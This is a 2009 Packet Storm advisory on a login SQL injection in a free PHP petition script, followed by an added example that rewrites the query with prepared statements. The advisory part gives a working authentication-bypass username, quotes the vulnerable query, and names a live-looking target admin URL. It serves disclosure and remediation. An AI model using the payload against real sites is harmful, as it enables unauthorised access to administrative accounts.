Free PHP Petition Signing Script SQL Injection

2009-03-27T00:00:00
ID PACKETSTORM:76115
Type packetstorm
Reporter Qabandi
Modified 2009-03-27T00:00:00

Description

                                        
`
  
  
######################################################  
# Free PHP Petition Signing Script Release #  
# Login SQL injection #  
######################################################  
# Qabandi | iqa[a]hotmail.fr #  
From Kuwait, Peace.  
Salamz: Killer Hack, Ghost-R00t, Mr.Mn7os, Cyb3rT  
######################################################  
Download: http://www.rediscussed.com/2008/01/18/free-php-petition-signing-script-release/  
------------------------------------------------------  
-:PoC:-  
  
  
http://usa-homeland.org/pet/signing_system-admin  
  
Username: admin ' or ' 1=1  
Password: nothing  
  
  
------------vuln--code---------(./signing_system-admin/index.php)  
  
$query = mysql_query("SELECT username,password FROM `accounts` WHERE username='$username' AND password='$password'", $conn) or die(mysql_error());  
  
------------------------------------  
  
  
`
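
The login lookup from index.php rewritten with bound parameters, as an added example that is not part of the original advisory or the script's own code. It assumes PDO with the pdo_sqlite driver as a stand-in for the script's MySQL connection and an `accounts` table that stores password_hash() output; the function name check_login() is hypothetical.

```php
<?php
// Added example: parameterized replacement for the interpolated query in
// ./signing_system-admin/index.php. check_login() is a hypothetical name.
// With interpolation, the PoC username turns the WHERE clause into
//   username='admin ' or ' 1=1' AND password='nothing'
// so the quote in the input ends the string literal and adds an OR branch.

function check_login(PDO $db, string $username, string $password): bool
{
    // The placeholder keeps $username as data; a quote inside it cannot
    // terminate the literal or change the structure of the WHERE clause.
    $stmt = $db->prepare('SELECT password FROM accounts WHERE username = ?');
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn();   // false when no row matches

    // Assumption: passwords are stored as password_hash() output, so the
    // comparison happens in PHP instead of inside the SQL statement.
    return is_string($hash) && password_verify($password, $hash);
}

// Constructed sample data in an in-memory database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE accounts (username TEXT PRIMARY KEY, password TEXT)');
$ins = $db->prepare('INSERT INTO accounts (username, password) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

$cases = [
    ['admin', 'correct horse'],       // valid credentials
    ['admin', 'nothing'],             // wrong password
    ["admin ' or ' 1=1", 'nothing'],  // the input from the PoC above
];
foreach ($cases as [$u, $p]) {
    printf("%-20s => %s\n", $u, check_login($db, $u, $p) ? 'accepted' : 'rejected');
}
```

The original line also ends in `or die(mysql_error())`, which sends database error text to the browser; log such errors server-side and return a generic failure message instead.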